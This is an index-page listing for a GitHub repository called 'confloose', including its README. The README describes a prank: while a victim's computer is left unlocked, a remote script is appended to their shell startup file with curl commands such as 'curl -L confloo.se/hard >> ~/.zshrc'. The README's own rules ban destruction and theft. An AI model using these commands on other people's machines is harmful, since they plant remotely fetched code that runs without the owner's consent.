Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/snaipe/confloose
The best startup scripts to prank IT people with
https://github.com/snaipe/confloose
Last synced: 21 days ago
JSON representation
The best startup scripts to prank IT people with
- Host: GitHub
- URL: https://github.com/snaipe/confloose
- Owner: Snaipe
- License: wtfpl
- Created: 2014-01-09T21:14:14.000Z (almost 11 years ago)
- Default Branch: master
- Last Pushed: 2016-10-20T15:44:34.000Z (about 8 years ago)
- Last Synced: 2024-10-31T11:45:20.406Z (2 months ago)
- Homepage:
- Size: 41 KB
- Stars: 22
- Watchers: 3
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
Confloose
=========A *confloose* (or "loose configuration") is a collection of the worst a startup
script can do to you.There has been a prank going on for quite some time in my IT school --
when someone leaves his computer unattended, and without locking it, one would
append a script to the victim's shell startup file.The deal is to put really annoying things right off the bat while not harming
the computer and the data on it -- this prank is meant as a lesson (you should
not leave your computer unattended in public space), and a fun challenge (at
least for the one watching from afar)How to confloose somebody :
---------------------------``curl -L confloo.se/the_script_name >> ~/.the_shell_rc``
So, as an example, confloosing someone with the "hard" script, using zsh :
``curl -L confloo.se/hard >> ~/.zshrc``
Available scripts :
-------------------* `hard` [bash, zsh]: Snaipe's original confloose
Rules :
-------
1. Don't destroy anything.
2. Don't steal anything.
3. Try to be cryptic.
4. Be fun and creative.Contributing :
--------------Think you have the perfect script to prank your coworkers ?
Submit a pull request with your script and add it to the readme,
with the compatible shells enclosed in brackets.